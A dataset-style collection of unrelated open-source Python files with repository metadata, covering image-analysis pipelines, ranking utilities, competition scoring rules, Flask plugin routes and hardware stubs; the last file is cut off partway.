2bdcd33401ff8240d2bd02c4fb44f1db772552fb | 1,587 | py | Python | main.py | maxBombrun/lipidDroplets | d624b718a7f70c45c1058938d916b78aa14390a7 | [
"BSD-3-Clause"
] | null | null | null | main.py | maxBombrun/lipidDroplets | d624b718a7f70c45c1058938d916b78aa14390a7 | [
"BSD-3-Clause"
] | null | null | null | main.py | maxBombrun/lipidDroplets | d624b718a7f70c45c1058938d916b78aa14390a7 | [
"BSD-3-Clause"
] | null | null | null | import os
import csv
import multiprocessing
import settings
import segmentNucAndGFP
import cellProfilerGetRelation
import measureGFPSize
import plotFeatures
import fusionCSV
import clusterDroplets
import computeZprime
settings.init()
CPPath=settings.pathList[0]
inputDataPath=settings.pathList[1]
resultPath=settings.pathList[2]
outputDetPath=settings.pathList[3]
inputCellProfilerPath=settings.pathList[4]
outputCellProfilerPath=settings.pathList[5]
nProc = multiprocessing.cpu_count()
listPlates= [x for x in os.listdir(inputDataPath) if os.path.isdir(inputDataPath+x) and x.startswith('plate')]
csv.register_dialect('unixpwd', delimiter=',',quotechar = '"', doublequote = True, skipinitialspace = False,lineterminator = '\n', quoting = csv.QUOTE_NONE)
print listPlates
## Segmentation of the nuclei and the lipid droplets
segmentNucAndGFP.segmentFatDroplet(listPlates)
## Cells approximation based on the previous segmentation
## and features extraction through CellProfiler
cellProfilerGetRelation.runCellProfilerRelationship()
## Individual lipid droplet measurements
## Creation of size distribution vectors
measureGFPSize.measureGFP()
## Classification of the cells based on the vectors
clusterDroplets.getClusterOfDroplets(nbClass=2)
## Creation of CSV output, summarizing the measurements per-cell and per-well
fusionCSV.getPerImageMeasurements()
## Plotting of the features
plotFeatures.plotFeat()
## Validation of the features through the computation of the Zprime factor
computeZprime.getZprime()
| 27.362069 | 158 | 0.7908 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 500 | 0.31506 |
2bddb9b7282ff011959fc2aa41a6520b2612a723 | 503 | py | Python | test/integration/test_load_shapefile_networkx_native.py | JoachimC/magicbox_distance | 3706172315f406a391bb643d494dad121b858e97 | [
"BSD-3-Clause"
] | null | null | null | test/integration/test_load_shapefile_networkx_native.py | JoachimC/magicbox_distance | 3706172315f406a391bb643d494dad121b858e97 | [
"BSD-3-Clause"
] | 12 | 2018-08-11T13:26:33.000Z | 2018-10-16T15:36:16.000Z | test/integration/test_load_shapefile_networkx_native.py | JoachimC/magicbox_distance | 3706172315f406a391bb643d494dad121b858e97 | [
"BSD-3-Clause"
] | null | null | null | import unittest
import networkx as nx
class TestLoadColumbiaRoadsNetworkXNative(unittest.TestCase):
def test_load(self):
# https://data.humdata.org/dataset/d8f6feda-6755-4e84-bd14-5c719bc5f37a (hotosm_col_roads_lines_shp.zip)
roads_file = "/Users/joachim/Downloads/hotosm_col_roads_lines_shp/hotosm_col_roads_lines.shp"
# todo : ImportError: read_shp requires OGR: http://www.gdal.org/
G = nx.read_shp(roads_file)
if __name__ == '__main__':
unittest.main()
| 29.588235 | 112 | 0.739563 | 412 | 0.819085 | 0 | 0 | 0 | 0 | 0 | 0 | 259 | 0.514911 |
2bdeec10badbbad623dc47ed6ce5bac529387aa3 | 2,732 | py | Python | model/Teams_data_prep.py | YWang9999/Fantasy-Premier-League | 906e470fa7514294ccf8dad0591b12fd4f40cb22 | [
"MIT"
] | null | null | null | model/Teams_data_prep.py | YWang9999/Fantasy-Premier-League | 906e470fa7514294ccf8dad0591b12fd4f40cb22 | [
"MIT"
] | null | null | null | model/Teams_data_prep.py | YWang9999/Fantasy-Premier-League | 906e470fa7514294ccf8dad0591b12fd4f40cb22 | [
"MIT"
] | null | null | null | import pandas as pd
from config import WEBSCRAPE_DATA_PATH, OUTPUT_DATA_PATH
import os
def get_understat_filepaths(file_path):
filepaths = []
team = []
for root, dirs, files in os.walk(file_path):
for filename in files:
if ('understat' in filename) and ('team' not in filename) and ('player' not in filename):
filepaths += [f"{root}/{filename}"]
team = team + [filename.split('_', 1)[1].split('.')[0].replace("_", " ")]
return pd.DataFrame({'Filepath': filepaths,
}, index=team)
def create_teams_data(filepath):
understat_year_df_dict = {}
understat_year_df_with_opps_dict = {}
for subdir in os.listdir(filepath):
year = int(subdir[:4])
understat_dict = {}
players_path = os.path.join(os.path.normpath(filepath), subdir)
understat_paths = get_understat_filepaths(os.path.join(players_path, 'understat'))
print(understat_paths)
teams_list = pd.DataFrame({'name': understat_paths.index.values})
teams_list['id'] = teams_list.index + 1
for team in understat_paths.index:
understat_dict[team] = pd.read_csv(understat_paths.loc[team, 'Filepath'],
usecols=['date', 'xG', 'xGA', 'xpts'])
understat_dict[team]['Team'] = team
understat_dict[team]['date'] = pd.to_datetime(understat_dict[team].date).dt.date
understat_dict[team].sort_values(['date'], ascending=True, inplace=True)
understat_dict[team]['Games_played'] = understat_dict[team].index + 1
understat_year_df_dict[year] = pd.concat(understat_dict.values())
understat_year_df_dict[year]['season'] = year
understat_year_with_id = understat_year_df_dict[year].merge(teams_list,
left_on='Team',
right_on='name').drop('name', axis=1)
understat_opponents_filtered = understat_year_with_id[['xG', 'xGA', 'xpts', 'Team', 'id']]
understat_year_df_with_opps_dict[year] = understat_year_with_id.\
merge(understat_opponents_filtered, left_on=['xG', 'xGA'], right_on=['xGA', 'xG'],
suffixes=('', '_opponent'), how='outer').drop(['xG_opponent', 'xGA_opponent'], axis=1)
return understat_year_df_with_opps_dict
def main():
teams_data_dict = create_teams_data(filepath=WEBSCRAPE_DATA_PATH)
teams_data_with_understat = pd.concat(teams_data_dict.values())
teams_data_with_understat.to_csv(os.path.join(OUTPUT_DATA_PATH, 'teams_data.csv'), index=False)
if __name__ == "__main__":
main()
| 45.533333 | 105 | 0.618594 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 293 | 0.107247 |
2be02c61f025593134bd6a0b8e769bcd4e8919c2 | 3,995 | py | Python | respy/tests/test_parallelism.py | tobiasraabe/respy_for_ma | 405f40851b176705fe924220fba606263d47f3d6 | [
"MIT"
] | null | null | null | respy/tests/test_parallelism.py | tobiasraabe/respy_for_ma | 405f40851b176705fe924220fba606263d47f3d6 | [
"MIT"
] | null | null | null | respy/tests/test_parallelism.py | tobiasraabe/respy_for_ma | 405f40851b176705fe924220fba606263d47f3d6 | [
"MIT"
] | null | null | null | import numpy as np
import pytest
from respy import RespyCls
from respy.python.shared.shared_constants import IS_PARALLELISM_MPI
from respy.python.shared.shared_constants import IS_PARALLELISM_OMP
from respy.tests.codes.auxiliary import compare_est_log
from respy.tests.codes.auxiliary import simulate_observed
from respy.tests.codes.random_model import generate_random_model
@pytest.mark.skipif(
not IS_PARALLELISM_MPI and not IS_PARALLELISM_OMP, reason="No PARALLELISM available"
)
class TestClass(object):
"""This class groups together some tests."""
def test_1(self):
"""Ensure that it makes no difference whether the
criterion function is evaluated in parallel or not.
"""
# Generate random initialization file
constr = {
"program": {"version": "fortran"},
"estimation": {"maxfun": np.random.randint(0, 50)},
}
params_spec, options_spec = generate_random_model(point_constr=constr)
# If delta is a not fixed, we need to ensure a bound-constraint optimizer.
# However, this is not the standard flag_estimation as the number of function
# evaluation is possibly much larger to detect and differences in the updates of
# the optimizer steps depending on the implementation.
if params_spec.loc[("delta", "delta"), "fixed"] is False:
options_spec["estimation"]["optimizer"] = "FORT-BOBYQA"
base = None
for is_parallel in [True, False]:
options_spec["program"]["threads"] = 1
options_spec["program"]["procs"] = 1
if is_parallel:
if IS_PARALLELISM_OMP:
options_spec["program"]["threads"] = np.random.randint(2, 5)
if IS_PARALLELISM_MPI:
options_spec["program"]["procs"] = np.random.randint(2, 5)
respy_obj = RespyCls(params_spec, options_spec)
respy_obj = simulate_observed(respy_obj)
_, crit_val = respy_obj.fit()
if base is None:
base = crit_val
np.testing.assert_equal(base, crit_val)
def test_2(self):
""" This test ensures that the record files are identical.
"""
# Generate random initialization file. The number of periods is higher than
# usual as only FORTRAN implementations are used to solve the random request.
# This ensures that also some cases of interpolation are explored.
constr = {
"program": {"version": "fortran"},
"num_periods": np.random.randint(3, 10),
"estimation": {"maxfun": 0},
}
params_spec, options_spec = generate_random_model(point_constr=constr)
base_sol_log, base_est_info_log = None, None
base_est_log = None
for is_parallel in [False, True]:
options_spec["program"]["threads"] = 1
options_spec["program"]["procs"] = 1
if is_parallel:
if IS_PARALLELISM_OMP:
options_spec["program"]["threads"] = np.random.randint(2, 5)
if IS_PARALLELISM_MPI:
options_spec["program"]["procs"] = np.random.randint(2, 5)
respy_obj = RespyCls(params_spec, options_spec)
file_sim = respy_obj.get_attr("file_sim")
simulate_observed(respy_obj)
respy_obj.fit()
# Check for identical records
fname = file_sim + ".respy.sol"
if base_sol_log is None:
base_sol_log = open(fname, "r").read()
assert open(fname, "r").read() == base_sol_log
if base_est_info_log is None:
base_est_info_log = open("est.respy.info", "r").read()
assert open("est.respy.info", "r").read() == base_est_info_log
if base_est_log is None:
base_est_log = open("est.respy.log", "r").readlines()
compare_est_log(base_est_log)
| 37.336449 | 88 | 0.618273 | 3,504 | 0.877096 | 0 | 0 | 3,616 | 0.905131 | 0 | 0 | 1,214 | 0.30388 |
2be40f59b3a6beb7eecae2366c58ea92cc8def63 | 2,170 | py | Python | qgis_plutil/http_server/routes.py | pyqgis/plutil | 79df2596e4e0340f3765ccb5bdfd4cc1d01fcb7d | [
"MIT"
] | null | null | null | qgis_plutil/http_server/routes.py | pyqgis/plutil | 79df2596e4e0340f3765ccb5bdfd4cc1d01fcb7d | [
"MIT"
] | null | null | null | qgis_plutil/http_server/routes.py | pyqgis/plutil | 79df2596e4e0340f3765ccb5bdfd4cc1d01fcb7d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
"""
from __future__ import unicode_literals
from __future__ import print_function
import logging
from json import dumps
from flask import request
logger = logging.getLogger('plutil.http.s')
def define_common_routes(plugin, app, server):
""" Some routes are always defined. """
@app.route('/', methods=['GET', 'POST'])
def route_index():
logger.debug("Server reached on root path")
the_args = request.args
for arg in the_args:
logger.debug(" - argument %s: %s", (arg, the_args[arg]))
return dumps({
'status': 'OK',
'result': the_args
})
@app.route('/shut_me_down_used_for_restarts', methods=['POST'])
def route_shutdown():
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Not running with the Werkzeug Server')
func()
return dumps({
'status': 'OK',
'result': "Shutting down..."
})
@app.route('/result', methods=['GET', 'POST'])
def route_result():
logger.debug("We're being asked about a result")
try:
message_id = str(request.args['id'])
with server.messages_lock:
if message_id in server.messages:
logger.debug("message %r found in queue", message_id)
message = server.messages[message_id]
del server.messages[message_id]
result_type = message.result_type
result_data = message.result_data
else:
logger.debug("message %r NOT found in queue", message_id)
result_type = 'NotFound'
result_data = 'Result may not be ready or it ' \
'might have expired'
except Exception:
result_data = 'Exception in server while attempting to reply'
result_type = 'Error'
logger.error(result_data, exc_info=True)
return dumps({
'status': result_type,
'result': result_data
})
| 31.449275 | 77 | 0.556682 | 0 | 0 | 0 | 0 | 1,838 | 0.847005 | 0 | 0 | 557 | 0.256682 |
2be5546ca3ebe936128f790d55f4f07b21737e0c | 4,932 | py | Python | utils/plackettluce.py | HarrieO/2021-SIGIR-plackett-luce-optimization | 969fc6681d179a5835137bc0115c9a8e868a83ec | [
"MIT"
] | 21 | 2021-05-07T09:49:51.000Z | 2022-03-28T19:10:06.000Z | utils/plackettluce.py | HarrieO/2021-SIGIR-plackett-luce-optimization | 969fc6681d179a5835137bc0115c9a8e868a83ec | [
"MIT"
] | 2 | 2021-07-29T04:19:33.000Z | 2021-09-10T08:41:22.000Z | utils/plackettluce.py | HarrieO/2021-SIGIR-plackett-luce-optimization | 969fc6681d179a5835137bc0115c9a8e868a83ec | [
"MIT"
] | 3 | 2021-06-25T08:08:53.000Z | 2021-09-14T23:53:53.000Z | # Copyright (C) H.R. Oosterhuis 2021.
# Distributed under the MIT License (see the accompanying README.md and LICENSE files).
import numpy as np
import utils.ranking as rnk
def sample_rankings(log_scores, n_samples, cutoff=None, prob_per_rank=False):
n_docs = log_scores.shape[0]
ind = np.arange(n_samples)
if cutoff:
ranking_len = min(n_docs, cutoff)
else:
ranking_len = n_docs
if prob_per_rank:
rank_prob_matrix = np.empty((ranking_len, n_docs), dtype=np.float64)
log_scores = np.tile(log_scores[None,:], (n_samples, 1))
rankings = np.empty((n_samples, ranking_len), dtype=np.int32)
inv_rankings = np.empty((n_samples, n_docs), dtype=np.int32)
rankings_prob = np.empty((n_samples, ranking_len), dtype=np.float64)
if cutoff:
inv_rankings[:] = ranking_len
for i in range(ranking_len):
log_scores += 18 - np.amax(log_scores, axis=1)[:, None]
log_denom = np.log(np.sum(np.exp(log_scores), axis=1))
probs = np.exp(log_scores - log_denom[:, None])
if prob_per_rank:
rank_prob_matrix[i, :] = np.mean(probs, axis=0)
cumprobs = np.cumsum(probs, axis=1)
random_values = np.random.uniform(size=n_samples)
greater_equal_mask = np.greater_equal(random_values[:,None], cumprobs)
sampled_ind = np.sum(greater_equal_mask, axis=1)
rankings[:, i] = sampled_ind
inv_rankings[ind, sampled_ind] = i
rankings_prob[:, i] = probs[ind, sampled_ind]
log_scores[ind, sampled_ind] = np.NINF
if prob_per_rank:
return rankings, inv_rankings, rankings_prob, rank_prob_matrix
else:
return rankings, inv_rankings, rankings_prob
def gumbel_sample_rankings(log_scores, n_samples, cutoff=None,
inverted=False, doc_prob=False,
prob_per_rank=False, return_gumbel=False):
n_docs = log_scores.shape[0]
ind = np.arange(n_samples)
if cutoff:
ranking_len = min(n_docs, cutoff)
else:
ranking_len = n_docs
if prob_per_rank:
rank_prob_matrix = np.empty((ranking_len, n_docs), dtype=np.float64)
gumbel_samples = np.random.gumbel(size=(n_samples, n_docs))
gumbel_scores = -(log_scores[None,:]+gumbel_samples)
rankings, inv_rankings = rnk.multiple_cutoff_rankings(
gumbel_scores,
ranking_len,
invert=inverted)
if not doc_prob:
if not return_gumbel:
return rankings, inv_rankings, None, None, None
else:
return rankings, inv_rankings, None, None, gumbel_scores
log_scores = np.tile(log_scores[None,:], (n_samples, 1))
rankings_prob = np.empty((n_samples, ranking_len), dtype=np.float64)
for i in range(ranking_len):
log_scores += 18 - np.amax(log_scores, axis=1)[:, None]
log_denom = np.log(np.sum(np.exp(log_scores), axis=1))
probs = np.exp(log_scores - log_denom[:, None])
if prob_per_rank:
rank_prob_matrix[i, :] = np.mean(probs, axis=0)
rankings_prob[:, i] = probs[ind, rankings[:, i]]
log_scores[ind, rankings[:, i]] = np.NINF
if return_gumbel:
gumbel_return_values = gumbel_scores
else:
gumbel_return_values = None
if prob_per_rank:
return rankings, inv_rankings, rankings_prob, rank_prob_matrix, gumbel_return_values
else:
return rankings, inv_rankings, rankings_prob, None, gumbel_return_values
def metrics_based_on_samples(sampled_rankings,
weight_per_rank,
addition_per_rank,
weight_per_doc,):
cutoff = sampled_rankings.shape[1]
return np.sum(np.mean(
weight_per_doc[sampled_rankings]*weight_per_rank[None, :cutoff],
axis=0) + addition_per_rank[:cutoff], axis=0)
def datasplit_metrics(data_split,
policy_scores,
weight_per_rank,
addition_per_rank,
weight_per_doc,
query_norm_factors=None,
n_samples=1000):
cutoff = weight_per_rank.shape[0]
n_queries = data_split.num_queries()
results = np.zeros((n_queries, weight_per_rank.shape[1]),)
for qid in range(n_queries):
q_doc_weights = data_split.query_values_from_vector(qid, weight_per_doc)
if not np.all(np.equal(q_doc_weights, 0.)):
q_policy_scores = data_split.query_values_from_vector(qid, policy_scores)
sampled_rankings = gumbel_sample_rankings(q_policy_scores,
n_samples,
cutoff=cutoff)[0]
results[qid] = metrics_based_on_samples(sampled_rankings,
weight_per_rank,
addition_per_rank,
q_doc_weights[:, None])
if query_norm_factors is not None:
results /= query_norm_factors
return np.mean(results, axis=0)
| 37.648855 | 88 | 0.642741 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 124 | 0.025142 |
2be5e7e6410c2cc0d07e72d3dc8d06cec338bdde | 575 | py | Python | demo_train.py | ryanfwy/image-quality | a7d0859e2bc6493885b41fd6aa85a9dfa980c656 | [
"MIT"
] | 1 | 2020-09-09T13:35:12.000Z | 2020-09-09T13:35:12.000Z | demo_train.py | ryanfwy/image-quality | a7d0859e2bc6493885b41fd6aa85a9dfa980c656 | [
"MIT"
] | null | null | null | demo_train.py | ryanfwy/image-quality | a7d0859e2bc6493885b41fd6aa85a9dfa980c656 | [
"MIT"
] | null | null | null | '''Train Siamese NIMA model networks.'''
from model.siamese_nima import SiameseNIMA
if __name__ == '__main__':
# dirs and paths to load data
train_image_dir = './assets/demo/train_images'
train_data_path = './assets/demo/train_data.csv'
# load data and train model
siamese = SiameseNIMA(output_dir='./assets')
train_raw = siamese.load_data(train_image_dir, train_data_path)
siamese.train(train_raw,
epochs=5,
batch_size=16,
nima_weight_path='./assets/weights/nima_weights_pre_trained.h5')
| 31.944444 | 82 | 0.673043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 220 | 0.382609 |
2be7223c4ab9ef92f6e5ecb73db51d52ed5811e3 | 132 | py | Python | quine_examples/quine_list.py | mbrown1413/Arbitrary-Quine | 758d55a590074d94f0b0f71dd0312923265a5a36 | [
"MIT"
] | 2 | 2016-07-18T14:05:48.000Z | 2021-12-05T11:35:06.000Z | quine_examples/quine_list.py | mbrown1413/Arbitrary-Quine | 758d55a590074d94f0b0f71dd0312923265a5a36 | [
"MIT"
] | null | null | null | quine_examples/quine_list.py | mbrown1413/Arbitrary-Quine | 758d55a590074d94f0b0f71dd0312923265a5a36 | [
"MIT"
] | null | null | null | lines = ['print "lines =", lines', 'for line in lines:', ' print line']
print "lines =", lines
for line in lines:
print line
| 26.4 | 74 | 0.613636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 69 | 0.522727 |
2be7280a605239a4f17fa1972d21696add9fd5df | 6,679 | py | Python | trojsten/rules/kms.py | MvonK/web | b701a6ea8fb6f0bdfb720e66d0a430db13db8bff | [
"MIT"
] | 5 | 2018-04-22T22:44:02.000Z | 2021-04-26T20:44:44.000Z | trojsten/rules/kms.py | MvonK/web | b701a6ea8fb6f0bdfb720e66d0a430db13db8bff | [
"MIT"
] | 250 | 2018-04-24T12:04:11.000Z | 2022-03-09T06:56:47.000Z | trojsten/rules/kms.py | MvonK/web | b701a6ea8fb6f0bdfb720e66d0a430db13db8bff | [
"MIT"
] | 8 | 2019-04-28T11:33:03.000Z | 2022-02-26T13:30:36.000Z | # -*- coding: utf-8 -*-
import datetime
from django.db.models import Count, Q
from django.utils import timezone
from trojsten.events.models import EventParticipant
from trojsten.people.constants import SCHOOL_YEAR_END_MONTH
from trojsten.results.constants import COEFFICIENT_COLUMN_KEY
from trojsten.results.generator import CategoryTagKeyGeneratorMixin, ResultsGenerator
from trojsten.results.representation import ResultsCell, ResultsCol, ResultsTag
from trojsten.submit.models import Submit
from .default import CompetitionRules
from .default import FinishedRoundsResultsRulesMixin as FinishedRounds
KMS_ALFA = "alfa"
KMS_BETA = "beta"
KMS_ALFA_MAX_COEFFICIENT = 3
KMS_ELIGIBLE_FOR_TASK_BOUND = [0, 2, 3, 5, 100, 100, 100, 100, 100, 100, 100]
KMS_FULL_POINTS_BOUND = [0, 1, 2, 3, 5, 8, 100, 100, 100, 100, 100]
KMS_CAMP_TYPE = "KMS sústredenie"
KMS_MO_FINALS_TYPE = "CKMO"
KMS_YEARS_OF_CAMPS_HISTORY = 10
class KMSResultsGenerator(CategoryTagKeyGeneratorMixin, ResultsGenerator):
def __init__(self, tag):
super(KMSResultsGenerator, self).__init__(tag)
self.camps = None
self.mo_finals = None
self.coefficients = {}
def get_user_coefficient(self, user, round):
if user not in self.coefficients:
if not self.camps or not self.mo_finals:
self.prepare_coefficients(round)
year = user.school_year_at(round.end_time)
successful_semesters = self.camps.get(user.pk, 0)
mo_finals = self.mo_finals.get(user.pk, 0)
self.coefficients[user] = year + successful_semesters + mo_finals
return self.coefficients[user]
def prepare_coefficients(self, round):
"""
Fetch from the db number of successful semester and number of participation
in MO final for each user and store them in dictionaries. The prepared
data in dictionaries are used to compute the coefficient of a given user.
We consider only events happened before given round, so the coefficients are computed
correct in older results.
"""
# We count only MO finals in previous school years, the user coefficient remains the same
# during a semester. We assume that the MO finals are held in the last semester
# of a year.
school_year = round.end_time.year - int(round.end_time.month < SCHOOL_YEAR_END_MONTH)
prev_school_year_end = timezone.make_aware(
datetime.datetime(school_year, SCHOOL_YEAR_END_MONTH, 28)
)
self.mo_finals = dict(
EventParticipant.objects.filter(
event__type__name=KMS_MO_FINALS_TYPE, event__end_time__lt=prev_school_year_end
)
.values("user")
.annotate(mo_finals=Count("event"))
.values_list("user", "mo_finals")
)
# We ignore camps that happened before KMS_YEARS_OF_CAMPS_HISTORY years, so we don't
# produce too big dictionaries of users.
self.camps = dict(
EventParticipant.objects.filter(
Q(
event__type__name=KMS_CAMP_TYPE,
event__end_time__lt=round.end_time,
event__end_time__year__gte=round.end_time.year - KMS_YEARS_OF_CAMPS_HISTORY,
),
Q(going=True) | Q(type=EventParticipant.PARTICIPANT),
)
.values("user")
.annotate(camps=Count("event__semester", distinct=True))
.values_list("user", "camps")
)
def get_cell_points_for_row_total(self, res_request, cell, key, coefficient):
return (
(1 + self.get_cell_total(res_request, cell)) // 2
if KMS_FULL_POINTS_BOUND[key] < coefficient or (self.tag.key == KMS_BETA and key == 3)
else self.get_cell_total(res_request, cell)
)
def run(self, res_request):
self.prepare_coefficients(res_request.round)
res_request.has_submit_in_beta = set()
for submit in Submit.objects.filter(
task__round__semester=res_request.round.semester, task__number__in=[8, 9, 10]
).select_related("user"):
res_request.has_submit_in_beta.add(submit.user)
return super(KMSResultsGenerator, self).run(res_request)
def is_user_active(self, request, user):
active = super(KMSResultsGenerator, self).is_user_active(request, user)
coefficient = self.get_user_coefficient(user, request.round)
if self.tag.key == KMS_ALFA:
active = active and (coefficient <= KMS_ALFA_MAX_COEFFICIENT)
if self.tag.key == KMS_BETA:
active = active and (
coefficient > KMS_ALFA_MAX_COEFFICIENT or user in request.has_submit_in_beta
)
return active
def deactivate_row_cells(self, request, row, cols):
coefficient = self.get_user_coefficient(row.user, request.round)
# Count only tasks your coefficient is eligible for
for key in row.cells_by_key:
if KMS_ELIGIBLE_FOR_TASK_BOUND[key] < coefficient:
row.cells_by_key[key].active = False
# Prepare list of piars consisting of cell and its points.
tasks = [
(cell, self.get_cell_points_for_row_total(request, cell, key, coefficient))
for key, cell in row.cells_by_key.items()
if row.cells_by_key[key].active
]
# Count only the best 5 tasks
for cell, _ in sorted(tasks, key=lambda x: x[1])[:-5]:
cell.active = False
def calculate_row_round_total(self, res_request, row, cols):
coefficient = self.get_user_coefficient(row.user, res_request.round)
row.round_total = sum(
self.get_cell_points_for_row_total(res_request, cell, key, coefficient)
for key, cell in row.cells_by_key.items()
if cell.active
)
def add_special_row_cells(self, res_request, row, cols):
super(KMSResultsGenerator, self).add_special_row_cells(res_request, row, cols)
coefficient = self.get_user_coefficient(row.user, res_request.round)
row.cells_by_key[COEFFICIENT_COLUMN_KEY] = ResultsCell(str(coefficient))
def create_results_cols(self, res_request):
yield ResultsCol(key=COEFFICIENT_COLUMN_KEY, name="K.")
for col in super(KMSResultsGenerator, self).create_results_cols(res_request):
yield col
class KMSRules(FinishedRounds, CompetitionRules):
RESULTS_TAGS = {
KMS_ALFA: ResultsTag(key=KMS_ALFA, name="Alfa"),
KMS_BETA: ResultsTag(key=KMS_BETA, name="Beta"),
}
RESULTS_GENERATOR_CLASS = KMSResultsGenerator
| 39.755952 | 98 | 0.672855 | 5,756 | 0.861677 | 215 | 0.032186 | 0 | 0 | 0 | 0 | 977 | 0.146257 |
2be799f355f713970380efb0ff0e7ecb819eb1f7 | 77 | py | Python | terrascript/consul/__init__.py | hugovk/python-terrascript | 08fe185904a70246822f5cfbdc9e64e9769ec494 | [
"BSD-2-Clause"
] | null | null | null | terrascript/consul/__init__.py | hugovk/python-terrascript | 08fe185904a70246822f5cfbdc9e64e9769ec494 | [
"BSD-2-Clause"
] | null | null | null | terrascript/consul/__init__.py | hugovk/python-terrascript | 08fe185904a70246822f5cfbdc9e64e9769ec494 | [
"BSD-2-Clause"
] | 1 | 2018-11-15T16:23:05.000Z | 2018-11-15T16:23:05.000Z | # Consul provider is not created through makecode.py
# because of issues 24.
| 25.666667 | 52 | 0.779221 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 75 | 0.974026 |
2be8a156acf59142491eb2fae24285870882e1a5 | 4,333 | py | Python | dac.py | hurasum/esp32_python | 59302ea48c3e1e0190fed09f78bb18d5f49b9c71 | [
"Unlicense"
] | null | null | null | dac.py | hurasum/esp32_python | 59302ea48c3e1e0190fed09f78bb18d5f49b9c71 | [
"Unlicense"
] | 1 | 2021-12-14T09:34:25.000Z | 2021-12-20T13:41:03.000Z | dac.py | hurasum/esp32_python | 59302ea48c3e1e0190fed09f78bb18d5f49b9c71 | [
"Unlicense"
] | null | null | null | """
DAC typing class
ESP32 has two 8-bit DAC (digital to analog converter) channels, connected to GPIO25 (Channel 1) and GPIO26 (Channel 2).
The DAC driver allows these channels to be set to arbitrary voltages.<br The DAC channels can also be driven with DMA-style written sample data, via the I2S driver when using the “built-in DAC mode”.
This class includes full support for using ESP32 DAC peripheral.
ESP32 DAC output voltage range is 0-Vdd (3.3 V), the resolution is 8-bits
"""
class DAC:
def deinit(self):
"""
Deinitialize the dac object, free the pin used.
"""
pass
def write(self, value):
"""
Set the DAC value. Valid range is: 0 - 255
The value of 255 sets the voltage on dac pin to 3.3 V
"""
pass
def waveform(self, freq, type ,duration=0 ,scale=0 ,offset=0 ,invert=2):
"""
Generate the waveform on the dac output
Arg Description
freq the waveform frequency; valid range:
16-32000 Hz for sine wave
500-32000 Hz for noise
170 - 3600 Hz for triangle
170 - 7200 Hz for ramp and sawtooth
type the waveform type, use one of the defined constants:
SINE, TRIANGLE, RAMP, SAWTOOTH and NOISE
duration optional, is given, waits for duration ms and stops the waveform
scale optional, only valid for sine wave; range: 0-3; scale the output voltage by 2^scale
offset optional, only valid for sine wave; range: 0-255; ofset the output voltage by offset value
invert optional, only valid for sine wave; range: 0-3; invert the half-cycle of the sine wave
"""
pass
def beep(self, freq, duration ,scale=0):
"""
Generate the sine wave beep on the dac output
Arg Description
freq fequency; valid range:
16-32000 Hz
duration the duration of the beep in ms
scale optional; range: 0-3; scale the output voltage by 2^scale
"""
pass
def write_timed(self, data, samplerate ,mode ,wait=False):
"""
Output the values on dac pin from array or file using ESP32 I2S peripheral
The data in array or file must be 8-bit DAC values
The data from array or file obtained with machine.ADC.read_timed() can be used.
Arg Description
data array object or filename
If an array object is given, write data from array object
The array object can be array of type 'B', or bytearray
If the filename is given, the datafrom the file will be output
samplerate the sample rate at which the data will be output
valid range: 5000 - 500000 Hz
mode optional, default: machine.DAC.NORMAL; if set to machine.DAC.CIRCULAR the data from array or file will be repeated indefinitely (or until stopped)
wait optional, default: False; if set to True waits for data output to finish
"""
pass
def write_buffer(self, data, freq ,mode ,wait=False):
"""
Output the values on dac pin from an array using timer
The in the array must be 8-bit DAC values
The data from an array obtained with machine.ADC.collect() can be used.
Arg Description
data array object of type 'B'
freq float; the frequency at which the data will be output
valid range: 0.001 - 18000 Hz
mode optional, default: machine.DAC.NORMAL; if set to machine.DAC.CIRCULAR the data from array will be repeated indefinitely (or until stopped).
Some 'cliks' can be expected when playing continuously if the first value differs from the last one.
wait optional, default: False; if set to True waits for data output to finish
"""
pass
def wavplay(self, wavfile, correct):
"""
Plays the WAV file on dac pin
Only PCM, 8-bit mono WAV files with sample rate >= 22000 can be played
If the optional argument correct is given, the sample rate is corrected by correct factor.
The allowed range is: -8.0 - +8.0 (float values can be entered).
"""
pass
def stopwave(self):
"""
Stops the background proces started by dac.waveform(), dac.write_timed() or dac.wavplay() function.
"""
pass
| 39.036036 | 199 | 0.647357 | 3,843 | 0.886096 | 0 | 0 | 0 | 0 | 0 | 0 | 3,783 | 0.872262 |
2bead42e8898fc07fa3042e49464fb1267055a6b | 44 | py | Python | vuln/__init__.py | Maskhe/DongTai-engine | 70d61617e4ba469adf8cf97879820d8a09a0359c | [
"Apache-2.0"
] | 16 | 2021-09-01T05:59:56.000Z | 2022-01-17T11:44:39.000Z | vuln/__init__.py | Maskhe/DongTai-engine | 70d61617e4ba469adf8cf97879820d8a09a0359c | [
"Apache-2.0"
] | 14 | 2021-09-17T10:00:20.000Z | 2022-02-15T10:55:32.000Z | vuln/__init__.py | Maskhe/DongTai-engine | 70d61617e4ba469adf8cf97879820d8a09a0359c | [
"Apache-2.0"
] | 26 | 2021-09-01T06:29:54.000Z | 2022-03-25T02:38:55.000Z | default_app_config = 'vuln.apps.VulnConfig'
| 22 | 43 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 22 | 0.5 |
2beb29bae6bf723ff96a9ddff8637a07400b2281 | 573 | py | Python | examples/itemrank_quick_query.py | cclauss/predictionio-sdk-python | 0de59e3d72afd2ba30121c2ab033715eb63e879f | [
"Apache-2.0"
] | 63 | 2015-01-07T19:49:59.000Z | 2016-09-22T01:53:13.000Z | examples/itemrank_quick_query.py | cclauss/predictionio-sdk-python | 0de59e3d72afd2ba30121c2ab033715eb63e879f | [
"Apache-2.0"
] | 8 | 2015-01-07T17:28:25.000Z | 2016-06-24T04:56:19.000Z | examples/itemrank_quick_query.py | cclauss/predictionio-sdk-python | 0de59e3d72afd2ba30121c2ab033715eb63e879f | [
"Apache-2.0"
] | 30 | 2015-01-08T19:12:05.000Z | 2016-09-17T07:56:24.000Z | """
itemrank quickstart query
"""
import predictionio
client = predictionio.EngineClient("http://localhost:8000")
# Rank item 1 to 5 for each user
item_ids = [str(i) for i in range(1, 6)]
